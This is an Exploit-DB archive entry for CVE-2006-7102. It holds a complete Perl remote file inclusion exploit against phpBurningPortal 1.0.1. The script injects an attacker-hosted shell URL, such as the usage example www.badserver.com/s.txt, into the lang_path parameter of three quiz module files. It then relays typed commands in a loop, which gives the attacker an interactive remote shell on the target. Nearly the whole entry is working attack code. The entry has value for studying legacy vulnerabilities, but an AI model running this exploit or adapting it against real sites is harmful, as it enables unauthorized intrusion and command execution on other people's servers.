phpBurningPortal <= 1.0.1 lang_path Remote File Include Exploit

2006-10-15T00:00:00
ID EDB-ID:2563
Type exploitdb
Reporter r0ut3r
Modified 2006-10-15T00:00:00

Description

phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit. CVE-2006-7102. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

use LWP::UserAgent;
use LWP::Simple;

$target = @ARGV[0];
$shellsite = @ARGV[1];
$shellcmd = @ARGV[2];
$fileno = @ARGV[3];

if(!$target || !$shellsite)
{
    usage();
}

header();

if ($fileno eq 1)
{
    $file = "quest_delete.php?lang_path=";
}
elsif ($fileno eq 2)
{
    $file = "quest_edit.php?lang_path=";
}
elsif ($fileno eq 3)
{
    $file = "quest_news.php?lang_path=";
}
else
{
    $file = "quest_delete.php?lang_path=";
}

print "[cmd]\$";
$cmd = &lt;STDIN&gt;;

while ($cmd !~ "exit")
{
    $xpl = LWP::UserAgent-&gt;new() or die;
        $req =
HTTP::Request-&gt;new(GET=&gt;$target'/modules/includes/'.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)
or die("\n\n Failed to connect.");
        $res = $xpl-&gt;request($req);
        $r = $res-&gt;content;
        $r =~ tr/[\n]/[&#234;]/;

    if (@ARGV[4] eq "-r")
    {
        print $r;
    }

    print "[cmd]\$";
    $cmd = &lt;STDIN&gt;;
}

sub header()
{
    print q
    {
########################################################################
    phpBurningPortal quiz-modul-1.0.1 - Remote File Include Exploit
               Vulnerability discovered and exploit by r0ut3r
                       writ3r@gmail.com
            For portal administrator testing purposes only!
########################################################################
    };
}

sub usage()
{
header();
    print q
    {
########################################################################
Usage:
perl q_xpl.pl &lt;Target website&gt; &lt;Shell Location&gt; &lt;CMD Variable&gt; &lt;No&gt; &lt;r&gt;
&lt;Target Website&gt; - Path to target eg: www.qvuln.target.com
&lt;Shell Location&gt; - Path to shell eg: www.badserver.com/s.txt
&lt;CMD Variable&gt; - Shell command variable name eg: cmd
&lt;No&gt; - File number, corresponding to:
1: quest_delete.php
2: quest_edit.php
3: quest_news.php
&lt;r&gt; - Show output from shell
Example:
perl a.pl http://localhost http://localhost/s.txt cmd 1 -r
########################################################################
    };
exit();
}

# milw0rm.com [2006-10-15]